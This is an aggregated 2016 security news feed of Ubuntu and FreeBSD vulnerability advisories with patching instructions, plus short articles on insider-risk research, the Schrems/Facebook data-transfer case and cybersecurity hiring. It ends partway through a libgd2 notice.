USN-2989-1: Linux kernel vulnerabilities

Ubuntu Security Notice USN-2989-1

1st June, 2016

linux vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

• Ubuntu 14.04 LTS

Summary

Several security issues were fixed in the kernel.

Software description

• linux - Linux kernel

Details

Justin Yackoski discovered that the Atheros L2 Ethernet Driver in the Linux
kernel incorrectly enables scatter/gather I/O. A remote attacker could use
this to obtain potentially sensitive information from kernel memory.
(CVE-2016-2117)

Jason A. Donenfeld discovered multiple out-of-bounds reads in the OZMO USB
over wifi device drivers in the Linux kernel. A remote attacker could use
this to cause a denial of service (system crash) or obtain potentially
sensitive information from kernel memory. (CVE-2015-4004)

Andy Lutomirski discovered a race condition in the Linux kernel's
translation lookaside buffer (TLB) handling of flush events. A local
attacker could use this to cause a denial of service or possibly leak
sensitive information. (CVE-2016-2069)

Ralf Spenneberg discovered that the Linux kernel's GTCO digitizer USB
device driver did not properly validate endpoint descriptors. An attacker
with physical access could use this to cause a denial of service (system
crash). (CVE-2016-2187)

Hector Marco and Ismael Ripoll discovered that the Linux kernel would
improperly disable Address Space Layout Randomization (ASLR) for x86
processes running in 32 bit mode if stack-consumption resource limits were
disabled. A local attacker could use this to make it easier to exploit an
existing vulnerability in a setuid/setgid program. (CVE-2016-3672)

Andrey Konovalov discovered that the CDC Network Control Model USB driver
in the Linux kernel did not cancel work events queued if a later error
occurred, resulting in a use-after-free. An attacker with physical access
could use this to cause a denial of service (system crash). (CVE-2016-3951)

It was discovered that an out-of-bounds write could occur when handling
incoming packets in the USB/IP implementation in the Linux kernel. A remote
attacker could use this to cause a denial of service (system crash) or
possibly execute arbitrary code. (CVE-2016-3955)

Kangjie Lu discovered an information leak in the ANSI/IEEE 802.2 LLC type 2
Support implementations in the Linux kernel. A local attacker could use
this to obtain potentially sensitive information from kernel memory.
(CVE-2016-4485)

Kangjie Lu discovered an information leak in the routing netlink socket
interface (rtnetlink) implementation in the Linux kernel. A local attacker
could use this to obtain potentially sensitive information from kernel
memory. (CVE-2016-4486)

It was discovered that in some situations the Linux kernel did not handle
propagated mounts correctly. A local unprivileged attacker could use this
to cause a denial of service (system crash). (CVE-2016-4581)

Update instructions

The problem can be corrected by updating your system to the following package version:

Ubuntu 14.04 LTS:

linux-image-3.13.0-87-powerpc-e500 3.13.0-87.133

linux-image-3.13.0-87-generic 3.13.0-87.133

linux-image-3.13.0-87-powerpc-smp 3.13.0-87.133

linux-image-3.13.0-87-powerpc-e500mc 3.13.0-87.133

linux-image-3.13.0-87-lowlatency 3.13.0-87.133

linux-image-3.13.0-87-generic-lpae 3.13.0-87.133

linux-image-3.13.0-87-powerpc64-smp 3.13.0-87.133

linux-image-3.13.0-87-powerpc64-emb 3.13.0-87.133

To update your system, please follow these instructions: http://ift.tt/17VXqjU.

After a standard system update you need to reboot your computer to make
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed.
Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,
linux-powerpc), a standard system upgrade will automatically perform
this as well.

References

CVE-2015-4004, CVE-2016-2069, CVE-2016-2117, CVE-2016-2187, CVE-2016-3672, CVE-2016-3951, CVE-2016-3955, CVE-2016-4485, CVE-2016-4486, CVE-2016-4581

from Ubuntu Security Notices http://ift.tt/1TWBI5w

Employee-Related Security Risks Are Addressed in our Latest Ponemon Institute Study

What keeps your cyber security team up at night, and does it weigh equally on the minds of managers? Do they lose sleep worrying about malicious attacks from outside your organization? Or do they fear a careless employee will leave a laptop in an unlocked car or use an unsecured personal mobile device to access proprietary company information?

Employee-related security risks are the top concern for security professionals, our new study, Managing Insider Risk Through Training & Culture, found. The Ponemon Institute polled more than 600 information security professionals at companies that have a data protection and privacy training program. The study found that while 55 percent of those surveyed have already had a malicious or negligent employee cause a security incident, few are taking adequate steps to improve security from within.

Not on the same page

One reason for this could be the imbalance between how the IT department perceives employee risk and how the C-suite does. While 66 percent of security professionals view employee-related risk as the biggest security threat, just 35 percent of them say their senior managers share that view. They may also feel less able to catch slip-ups versus intentional acts; security pros are far more concerned that an employee will unintentionally cause an incident than they are about workers potentially perpetrating malicious attacks.

Often, companies focus their cyber security efforts on preventing, catching and remedying intentional attacks. And while they can do much to reduce the risk of employees unintentionally causing an incident, few companies are doing everything they can. Less than half (46 percent) of the surveyed companies require cyber security training for all employees, and 60 percent don’t make employees retrain after a data breach.

Actionable suggestions for teachable moments

The problem of employee-related security risks is not unsolvable. Companies need to take steps to create a culture of security at every level of their organizations. These steps should include:

• Requiring mandatory advanced-level training for all full and part-time employees and contract workers. Typically, companies that do provide training don’t require it for all employees, or they take a tiered approach that fails to provide all employees with a comprehensive understanding of the risks. Our study found just 43 percent of companies provide only one basic course for all employees. Basic courses often omit significant risks that can lead to a data breach. What’s more, retraining needs to occur on an ongoing basis, as new threats emerge in the cyber security realm. Retraining is especially important following a breach, when employees’ awareness of cyber security risks is highest.
• Establishing and enforcing a system of carrots and sticks. More than half (56 percent) of companies deal with an employee’s careless handling of data by having that employee meet one-on-one with a superior, and 51 percent have them meet with an IT security person. Less than half (45 percent) give formal reprimands, 19 percent demote the employee, and 16 percent cut salary, bonuses or incentives. However, sticks are only half the solution. Companies also need to incentivize employees to be cognizant of cyber security and few are doing a good job of it. In fact, 67 percent do nothing at all to encourage employees to proactively protect data.

Employees should be a company’s greatest asset. With the right training and an ongoing emphasis on cyber security, every member of your corporate team can help reduce your organization’s risk of a negligence-related cyber security incident.  To download the complimentary report, visit http://bit.ly/22vZ31n.

The post Employee-Related Security Risks Are Addressed in our Latest Ponemon Institute Study appeared first on Data Breach Resolution.

from Data Breach Resolution http://ift.tt/22wuV69

Ireland Refers Facebook Privacy Case to EU

Ireland is referring a high-profile privacy case to the European Court of Justice for clarity on the rules governing international data transfers.

The case that Max Schrems brought to the Irish data protection regulator against Facebook resulted in last October’s ruling that the “Safe Harbor” clause is declared invalid. The effect of this is that American tech companies can no longer easily house their international customer/member/subscriber data on servers within EU countries.

Under European data privacy principles, companies operating in the EU are not allowed to send personal data to countries with less stringent privacy regulations. The US is considered to be one such country. To overcome this commercial difficulty the two sides had developed the Safe Harbor agreement: Provided that the US company concerned agrees to abide by certain privacy guarantees, it was able to receive personal data from EU sources.

The Edward Snowden revelations on the NSA Prism surveillance program prompted many European politicians and private citizens to question whether the Safe Harbor arrangement was actually compatible with EU privacy dictates. Schrems thought not, and took the case to Ireland, where Facebook houses its European servers. After taking the social network to court, he was eventually gratified with a ruling in his favor and the EU’s tossing out of Safe Harbor.

Now, as the US and the EU try to hammer out an appropriate Safe Harbor replacement, the Irish regulator is carrying out a requirement to investigate these transfers in more detail. It has now informed Schrems and Facebook that it plans to go through the Irish High Court to ask the ECJ to give a legal interpretation about the legal status of data transfers under so-called “Model Clauses.”

Model Clauses are kind of like best practices. The Council and the European Parliament have given the Commission the power to decide on certain standard contractual clauses—the Model Clauses—that offer sufficient safeguards “with respect to the protection of the privacy and fundamental rights and freedoms of individuals and as regards the exercise of the corresponding rights.”

“We continue to thoroughly and diligently investigate Mr. Schrems’ complaint to ensure the adequate protection of personal data,” it said in a statement. “We yesterday informed Mr. Schrems and Facebook of our intention to seek declaratory relief in the Irish High Court and a referral to the CJEU to determine the legal status of data transfers under Standard Contractual Clauses. We will update all relevant parties as our investigation continues.”

This does not have any immediate impact on the legal status of Model Clauses in general, according to Jonathan Armstrong, a compliance lawyer with Cordery in London. This is because they have already been confirmed as being an appropriate protection for transfers of data by European data protection regulators.

“However, this question will now be for the ECJ to decide upon, and, on average it can take 18 months to two years before the European Court gives its ruling,” he said in a brief.

He added, “at this stage there are few details about the substance of the referral. We do not know whether any question (or judgement) will relate to Model Clauses in general, or be limited to Facebook’s particular use of Model Clauses when making data transfers from the EU to the US, and any interaction with the US authorities. This action however adds to the uncertainty facing European businesses with presence in the US or using US service providers.”

Incidentally, Giovanni Buttarelli, the European Data Protection Supervisor, rejected the EU-US Privacy Shield pact this week, saying it is not robust enough and that the data transfer pact between the EU and US needs “significant improvements.” While his statement does not mean the agreement will be scrapped, his concerns echo those expressed by European privacy regulators in April.

Photo © sezer66

from Infosecurity - Latest New... http://ift.tt/1TVEgRm

Orgs Can Address Cyber-Workforce Shortage with Narrower Focus

While corporates are starting to put ever-greater emphasis on the recruitment of specialists, the first step is identifying exactly which specific skills are needed to reduce the risk of cyber-attacks. One answer could be to look for siloed skills instead of broad, CISO-type domain experts.

The workforce skills shortage is a well-known hindrance for companies looking to improve their security posture—an organization can have all the platforms and solutions in place that it likes, but skilled cybersecurity staff is still a linchpin for success. Global talent mapping and pipelining company Armstrong Craven has carried out a series of projects in the financial services sector, one of the more high-risk industries, to determine if there are tactics that can help companies overcome the lack of skilled all-stars available for hire.

Interestingly, it found that the Association of British Insurers may have hit on a piece of the solution with its call for a central database of cyber-incidents.  

The ABI says there is a need for a national, anonymized database recording details of cyber incidents at companies to be established if the UK is to become a world leader in cyber-insurance.

But Armstrong Craven believes the database can be of benefit in other ways too, and could play a role in ensuring the best talent was deployed in the businesses facing the gravest danger.

“One of the biggest challenges facing a business is knowing what skills they require within their organization,” said Brunella Flackett, client partner for financial services and private equity with Armstrong Craven. “The database would allow us to identify which businesses and sectors are most susceptible and then match them with the right structures and skill sets.”

The company recently carried out a succession planning mapping assignment for the role of chief information security officer in a major financial services organization; the role was extremely broad and cyber was one of several skill sets required. The better route, according to Flackett, lies in creating designated roles for more specific cyber-specialists.

“The talent that financial services firms need to attract is very different to the kind of talent they are used to recruiting,” said Flackett. “Candidates are coming from a digital world, often from another sector. Some corporates are going as far as creating dedicated work areas for their digital talent, far removed from the traditional financial services, suit-and-tie environment.”

Armstrong Craven also recently completed an insight project for an insurance client who wanted to understand the optimal organizational structure for a number of different areas, including digital. It wanted to know what best practices looked like in other sectors as well as its own, including how others are addressing the cyber-issue—using this information to drill down into areas of specialized need.

By removing the need to fill positions with those with omnibus skill sets, companies may have an easier time recruiting the talents they need to optimize their cybersecurity posture.

“Because the cyber risk is a fast emerging area, the talent is scarce and therefore in high demand,” said Flackett. “Organizations are moving fast to map and pipeline the best talent in this very specialist field to ensure they have the best possible strategy in place in the event of attack.”

Photo © Marcin Wos

from Infosecurity - Latest New... http://ift.tt/1sJGw54

Google Mulls Naming and Shaming on Android's Security Swamp

Sirin Labs launches ultra-secure, ultra-expensive Solarin smartphone

MySpace hack puts another 427 million passwords up for sale

US court says cops don't need a warrant for cell location data

Bugtraq: FreeBSD Security Advisory FreeBSD-SA-16:22.libarchive

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA512

========================================================================

=====

FreeBSD-SA-16:22.libarchive Security Advisory

The FreeBSD Project

Topic: Directory traversal in cpio(1)

Category: contrib

Module: libarchive

Announced: 2016-05-31

Credits: Alexander Cherepanov

Affects: All supported versions of FreeBSD

Corrected: 2016-05-21 09:03:45 UTC (stable/10, 10.3-STABLE)

2016-05-31 16:35:03 UTC (releng/10.3, 10.3-RELEASE-p4)

2016-05-31 16:33:56 UTC (releng/10.2, 10.2-RELEASE-p18)

2016-05-31 16:32:42 UTC (releng/10.1, 10.1-RELEASE-p35)

2016-05-21 09:27:30 UTC (stable/9, 9.3-STABLE)

2016-05-31 16:23:56 UTC (releng/9.3, 9.3-RELEASE-p43)

CVE Name: CVE-2015-2304

For general information regarding FreeBSD Security Advisories,

including descriptions of the fields above, security branches, and the

following sections, please visit <URL:http://ift.tt/1W1G8vo;.

I. Background

The libarchive(3) library provides a flexible interface for reading and

writing streaming archive files such as tar(1) and cpio(1), and has been the

basis for the FreeBSD implementation of the tar(1) and cpio(1) utilities

since FreeBSD 5.3.

II. Problem Description

The cpio(1) tool from the libarchive(3) bundle is vulnerable to a directory

traversal problem via absolute paths in an archive file.

III. Impact

A malicious archive file being unpacked can overwrite an arbitrary file on

a filesystem, if the owner of the cpio process has write access to it.

IV. Workaround

No workaround is available.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or

release / security branch (releng) dated after the correction date.

Reboot is not required.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64

platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch

# freebsd-update install

Reboot is not required.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable

FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the

detached PGP signature using your PGP utility.

[FreeBSD 10.x]

# fetch http://ift.tt/1O2JWd8

# fetch http://ift.tt/1r1kQQR

# gpg --verify libarchive-10.patch.asc

[FreeBSD 9.3]

# fetch http://ift.tt/1O2K7oW

# fetch http://ift.tt/1r1kWry

# gpg --verify libarchive-9.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src

# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as

described in <URL:http://ift.tt/1Us7cAG;.

VI. Correction details

The following list contains the correction revision numbers for each

affected branch.

Branch/path Revision

- ------------------------------------------------------------------------

-

stable/9/ r300363

releng/9.3/ r301044

stable/10/ r300361

releng/10.1/ r301046

releng/10.2/ r301047

releng/10.3/ r301048

- ------------------------------------------------------------------------

-

To see which files were modified by a particular revision, run the

following command, replacing NNNNNN with the revision number, on a

machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<URL:http://ift.tt/1Tj8sDF;

VII. References

<URL:http://ift.tt/1r1kHwF;

The latest revision of this advisory is available at

<URL:http://ift.tt/1O2K0tB

.asc>

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJXTcSSAAoJEO1n7NZdz2rnpSIQAL4Ao7qcCFcqckTLAwR3UyTe

e65MD/dXcD+Zn6XWao5t/nLQRFyzJgD6p3HIahcPMBXdzaYOlYxVfU7wMlw95llZ

mKruSMP1rT59zxwyP+aLh34aRMRmVu+/L8xMHThMBNyiIFjhiyLIvzm4+k+/vBHY

V1Jc7RdEQr4A19zzhmklCMzttf2M85NggWDraPQfUMyjXwrLDc6Pc1x7w8w8/OAB

Jyj9tiu883epPstgk8uKVqRaa96SGcwFt9Rsp8WZf0/rfk21BS2hNnlxrjPhdkAU

s5KZnCqudbh4Uv0KRLO0htLTMo2QU0gP0d/QeoLBxaPo2VaXrB6jvv7KhDInIpRe

xDQYuc3d/D1m0DkIIjglxKhtunozPdxL3PmzrkY/C3qgFY4RxBCPN60OJ9lTxC15

H6/FVljRpSFUST5goQ9jsAA+oJ6B+dD4sYU6kh1hTkHeCD/EA+QH66YwzZquGi/T

4oDNTLSwgfGH/1OzkkhuWCANvVkWO+EckSVX3/sEaud/Z2zRNV0dELbS2NUs3yGl

sbAytECuvMMEx4FsCteLs9yKrTQmC+OrKBkEtUxoCMQi4eQsEGyH26mHM/L9MOP3

dyFP2V1dSd3392sGCvjInb9lxAmw5+by3nPzKVnIUW+jLaICdWFzwWhi7ycHupsU

GH8PGGPIFUd81r7gzrF8

=+ZX7

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/1O2K7p4

Bugtraq: FreeBSD Security Advisory FreeBSD-SA-16:20.linux

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA512

========================================================================

=====

FreeBSD-SA-16:20.linux Security Advisory

The FreeBSD Project

Topic: Kernel stack disclosure in Linux compatibility layer

Category: core

Module: linux(4)

Announced: 2016-05-31

Credits: CTurt

Affects: All supported versions of FreeBSD.

Corrected: 2016-05-31 16:57:42 UTC (stable/10, 10.3-STABLE)

2016-05-31 16:55:50 UTC (releng/10.3, 10.3-RELEASE-p4)

2016-05-31 16:55:45 UTC (releng/10.2, 10.2-RELEASE-p18)

2016-05-31 16:55:41 UTC (releng/10.1, 10.1-RELEASE-p35)

2016-05-31 16:58:00 UTC (stable/9, 9.3-STABLE)

2016-05-31 16:55:37 UTC (releng/9.3, 9.3-RELEASE-p43)

For general information regarding FreeBSD Security Advisories,

including descriptions of the fields above, security branches, and the

following sections, please visit <URL:http://ift.tt/1W1G8vo;.

I. Background

FreeBSD is binary-compatible with the Linux operating system through a

loadable kernel module/optional kernel component. The support is provided

for amd64 and i386 machines.

II. Problem Description

The implementation of the TIOCGSERIAL ioctl(2) does not clear the output

struct before copying it out to userland.

The implementation of the Linux sysinfo() system call does not clear the

output struct before copying it out to userland.

III. Impact

An unprivileged user can read a portion of uninitialised kernel stack data,

which may contain sensitive information, such as the stack guard, portions

of the file cache or terminal buffers, which an attacker might leverage to

obtain elevated privileges.

IV. Workaround

No workaround is available, but systems not using the Linux binary

compatibility layer are not vulnerable.

The Linux compatibility layer is not included in the default GENERIC kernel.

The following command can be used to test if the Linux binary compatibility

layer is loaded:

# kldstat -m linuxelf

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or

release / security branch (releng) dated after the correction date.

Reboot is required.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64

platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch

# freebsd-update install

Reboot is required.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable

FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the

detached PGP signature using your PGP utility.

# fetch http://ift.tt/1O2JBqV

# fetch http://ift.tt/1r1kcTx

# gpg --verify linux.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src

# patch < /path/to/patch

c) Recompile your kernel as described in

<URL:http://ift.tt/1Tj87kl; and reboot the

system.

VI. Correction details

The following list contains the correction revision numbers for each

affected branch.

Branch/path Revision

- ------------------------------------------------------------------------

-

stable/9/ r301055

releng/9.3/ r301049

stable/10/ r301054

releng/10.1/ r301050

releng/10.2/ r301051

releng/10.3/ r301052

- ------------------------------------------------------------------------

-

To see which files were modified by a particular revision, run the

following command, replacing NNNNNN with the revision number, on a

machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<URL:http://ift.tt/1Tj8sDF;

VII. References

<URL:http://ift.tt/1Us7NCb;

The latest revision of this advisory is available at

<URL:http://ift.tt/1r1klGm;

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJXTcSOAAoJEO1n7NZdz2rnjSMP/AsGK5jda/QlrRrpvKyd3HGr

qVsTzro+a2ed2ZlUCamM/JICXfbAit+dOioui+CIN1IKai/mxNPMpIWcPRx1AhDr

3y52MmSzkCqK6QT3tvwYYaG4uOZ3/wbWAJ8EKz2qqYlZ4hkmy24BdvTCGB2SGDgo

Nz1P60NWxaqafCwFyb0xz7Lful52txSLIr9mWZzTcSgwNNEscGiMgzXiY64GlWfQ

r20udpFrPG5+OOwpFAdR4IImQA7B0AYD064NbzN9A+mJlbhtGguDS3oTkbVBVIbF

ldLgDkrFeIv/Jyhvij1q85xfuOxT6eaVJe7qGUaV8v6qQx17VhH8j0sVzn6nh0w9

kly4FB0osyZRQJ7bV7c+FVGECUWRyzSpeo7lx6ICXECuyzcX9U4IxC0oxPcokD3o

CEOJkQEjLtMSfKdE143lbyPCtZUMSXtp/CLEUxW7eDCbW89O7p7pv6xTiNLdopVT

cpUcF+Y0KepwMrg+jXH8i07yF6QgqRWVziA16821OJ4ThD0RN4MRrWUizl/1J2iD

LFGxK8l2U3hP5dhXpYpEHsI2xkU94Lojp0SfngFoylo4Z8UjpQeaR9NG+F3+uR45

Q8aGB3CQe84JZUzFfVN6292AE/4ZMg13iRzKUawV8JBUEWG+MnrtU6a7zwIRVM2F

zT2f1EP7488fCSxbmicf

=bohu

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/1r1kOIJ

Bugtraq: FreeBSD Security Advisory FreeBSD-SA-16:23.libarchive

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA512

========================================================================

=====

FreeBSD-SA-16:23.libarchive Security Advisory

The FreeBSD Project

Topic: Buffer overflow in libarchive(3)

Category: contrib

Module: libarchive

Announced: 2016-05-31

Affects: FreeBSD 9.3

Corrected: 2016-05-21 09:27:30 UTC (stable/9, 9.3-STABLE)

2016-05-31 16:23:56 UTC (releng/9.3, 9.3-RELEASE-p43)

CVE Name: CVE-2013-0211

For general information regarding FreeBSD Security Advisories,

including descriptions of the fields above, security branches, and the

following sections, please visit <URL:http://ift.tt/1W1G8vo;.

I. Background

The libarchive(3) library provides a flexible interface for reading and

writing streaming archive files such as tar and cpio, and has been the

basis for FreeBSD's implementation of the tar(1) and cpio(1) utilities

since FreeBSD 5.3.

II. Problem Description

An integer signedness error in the archive_write_zip_data() function in

archive_write_set_format_zip.c in libarchive(2) could lead to a buffer

overflow on 64-bit machines.

III. Impact

An attacker who can provide input of their choice for creating a ZIP archive

can cause a buffer overflow in libarchive(2) that results in a core dump or

possibly execution of arbitrary code provided by the attacker.

IV. Workaround

No workaround is available but 32-bit systems are not vulnerable.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or

release / security branch (releng) dated after the correction date.

Reboot is not required.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64

platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch

# freebsd-update install

A reboot is not required.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable

FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the

detached PGP signature using your PGP utility.

# fetch http://ift.tt/1Us7vLF

# fetch http://ift.tt/1XMZILd

# gpg --verify libarchive.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src

# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as

described in <URL:http://ift.tt/1Us7cAG;.

Restart the applicable daemons, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each

affected branch.

Branch/path Revision

- ------------------------------------------------------------------------

-

stable/9/ r300363

releng/9.3/ r301044

- ------------------------------------------------------------------------

-

To see which files were modified by a particular revision, run the

following command, replacing NNNNNN with the revision number, on a

machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<URL:http://ift.tt/1Tj8sDF;

VII. References

<URL:http://ift.tt/1Us7IhY;

The latest revision of this advisory is available at

<URL:http://ift.tt/1XMZHqw

.asc>

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJXTcSUAAoJEO1n7NZdz2rnjuwP/36GShkMxVtvEF3LeZCtT1bT

J0TSoXWpOo8rW61W0VEQ8xxOupIUwpDC2zwvgg0ZuPPbUY1nKYGrql8hixzmyg7n

Da7krIxv7guTrpIWumEztS7JAVjZWEW+SfwiXZ7OY+3KHSLcGh5E0MpEvWDy+Ysa

5/fjyaxYV2jHCaXwqNpCHv9ahS3Ca4VMr37E2H+3efdbSzkfUz17nReNjBtk8P76

5teuC/PZ0aXIToOBuP039NPy7Cw42AsgAnEDLayEMIuuq/u4JVmDUONcnjfQ4occ

tlCl3tNmk8LR9kotcvkg+7ZDOZ6zq4NHkcpjek8GPqScV2EgY0wixf4Eo2hD4P4x

NDo4pkzt5L+6mkJoSc/6zBYiVGLAqGBMDqsaemqBL/aTLH6+W+Bulvr9prfB2EIN

EBWfO4zkA3tKAPAZIpCQRzG2FScOjNeH49hy+ISTUWYcWDtNrpYIJdhX+XtsuZIt

Swd++AYcvnDJGX8bTPRb8nOlBWqAAscuIJsvyqyRVahmKrG2USECmhvaIN6jPbVq

8dScr0yO0ixzUpnkEMV8GW8kstC5mwCihJ4MG5qDtsWGYybH93N22eHZyOlCqa9J

d+V8OzEiVEtGtdDqbThDW3FfuimAm6aShTLxATeJTGbc+mQEdUMjjgAmrvCZxcEZ

URXCjA5XayDc0iZySd4r

=XTv8

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/1XMZMdE

Bugtraq: FreeBSD Security Advisory FreeBSD-SA-16:21.43bsd

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA512

========================================================================

=====

FreeBSD-SA-16:21.43bsd Security Advisory

The FreeBSD Project

Topic: Kernel stack disclosure in 4.3BSD compatibility layer

Category: core

Module: kernel

Announced: 2016-05-31

Credits: CTurt

Affects: All supported versions of FreeBSD.

Corrected: 2016-05-31 16:57:42 UTC (stable/10, 10.3-STABLE)

2016-05-31 16:55:50 UTC (releng/10.3, 10.3-RELEASE-p4)

2016-05-31 16:55:45 UTC (releng/10.2, 10.2-RELEASE-p18)

2016-05-31 16:55:41 UTC (releng/10.1, 10.1-RELEASE-p35)

2016-05-31 16:58:00 UTC (stable/9, 9.3-STABLE)

2016-05-31 16:55:37 UTC (releng/9.3, 9.3-RELEASE-p43)

For general information regarding FreeBSD Security Advisories,

including descriptions of the fields above, security branches, and the

following sections, please visit <URL:http://ift.tt/1W1G8vo;.

I. Background

FreeBSD has binary compatibility layer with historic 4.3BSD operating

system.

II. Problem Description

The implementation of historic stat(2) system call does not clear the

output struct before copying it out to userland.

III. Impact

An unprivileged user can read a portion of uninitialised kernel stack data,

which may contain sensitive information, such as the stack guard, portions

of the file cache or terminal buffers, which an attacker might leverage to

obtain elevated privileges.

IV. Workaround

No workaround is available, but systems not using the 4.3BSD compatibility

layer are not vulnerable.

The 4.3BSD compatibility layer is not included into the default GENERIC kernel

configuration. A custom kernel config that does not have the COMPAT_43 option

is also not vulnerable.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or

release / security branch (releng) dated after the correction date.

Reboot is required.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable

FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the

detached PGP signature using your PGP utility.

# fetch http://ift.tt/1XMZHH0

# fetch http://ift.tt/1Us7CXI

# gpg --verify stat.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src

# patch < /path/to/patch

c) Recompile your kernel as described in

<URL:http://ift.tt/1Tj87kl; and reboot the

system.

VI. Correction details

The following list contains the correction revision numbers for each

affected branch.

Branch/path Revision

- ------------------------------------------------------------------------

-

stable/9/ r301055

releng/9.3/ r301049

stable/10/ r301054

releng/10.1/ r301050

releng/10.2/ r301051

releng/10.3/ r301052

- ------------------------------------------------------------------------

-

To see which files were modified by a particular revision, run the

following command, replacing NNNNNN with the revision number, on a

machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<URL:http://ift.tt/1Tj8sDF;

VII. References

<URL:http://ift.tt/1Us7NCb;

The latest revision of this advisory is available at

<URL:http://ift.tt/1XN05W1;

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJXTcSQAAoJEO1n7NZdz2rn/JYQAKrbMPuSBxDZzMS0iq76R5Gw

RPkTZcH5zFqXI6s7WGNLtdV6VgatQtG8WsYdaGn+E+dKqGmIu4xtcIfXS6dgP/fT

aqP522x5CbZt2nl3bpQ/vPDnJbEJ/a25nydLjHuCbJP1MqPKCWOJFlt/EOXlqXd4

SptiShq/EDPZgJSODmGp34raAIIeuMHUz2gF8YEBD3Uu8cV6zMHlc1Lj8veI1NJv

xKaSK+31HAdAgkP5NKPEXA3Ei553i1tzN8KGgbEeFvsjtNUuqxR8n2nB2XJ3GANb

E7Z3byjajZqgYim6tYqobAyZEjrdGInNt8E5XEdrJhsIhzn6mqcdpJsf9yur1xY2

TSNaNNlWGicd1TYuPQjd7LPiqKKdIKO3s7P3vHXhJRvy2vD9B4NfX/kcU1UjJkAI

h19iI1B9WbiLakTTJLSn5tcSSIUUNJ3c70jYIoo4WOEHN3x8HvjtaGuH2TK89CA2

tPqkKau4Txd3ikdpNbU6pYDyWAYG+z/cH6F1dYrkchULK8uNP+sEkHai2MYtNv/W

Q0CDy46iHBmbYkTwlEDxPkfDEKsiUbm32AgvfwuEAfjszwYuO1+KjZ6oKXwycQz9

gCyNZVfsjSOV5srzVQ2daUmuNkQiua2zt8JX5J64rUJSYx3AkZHOTNxmVEu12K1U

RdI/7TaMcgMzkGMlwEv9

=qPmZ

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/1XMZKmj

USN-2988-1: LXD vulnerabilities

Ubuntu Security Notice USN-2988-1

31st May, 2016

lxd vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

• Ubuntu 16.04 LTS
• Ubuntu 15.10

Summary

Several security issues were fixed in LXD.

Software description

• lxd - Container hypervisor based on LXC

Details

Robie Basak discovered that LXD incorrectly set permissions when setting up
a loop based ZFS pool. A local attacker could use this issue to copy and
read the data of any LXD container. (CVE-2016-1581)

Robie Basak discovered that LXD incorrectly set permissions when switching
an unprivileged container into privileged mode. A local attacker could use
this issue to access any world readable path in the container directory,
including setuid binaries. (CVE-2016-1582)

Update instructions

The problem can be corrected by updating your system to the following package version:

Ubuntu 16.04 LTS:

lxd 2.0.2-0ubuntu1~16.04.1

Ubuntu 15.10:

lxd 0.20-0ubuntu4.2

To update your system, please follow these instructions: http://ift.tt/17VXqjU.

In general, a standard system update will make all the necessary changes.

References

CVE-2016-1581, CVE-2016-1582

from Ubuntu Security Notices http://ift.tt/24hPxhB

Millions of PCs ship with bloatware riddled with security flaws, say researchers

USN-2987-1: GD library vulnerabilities

Ubuntu Security Notice USN-2987-1

31st May, 2016

libgd2 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

• Ubuntu 16.04 LTS
• Ubuntu 15.10
• Ubuntu 14.04 LTS
• Ubuntu 12.04 LTS

Summary

The GD library could be made to crash or run programs if it processed a specially crafted image file.

Software description

• libgd2 - GD Graphics Library

Details

It was discovered that the GD library incorrectly handled certain color
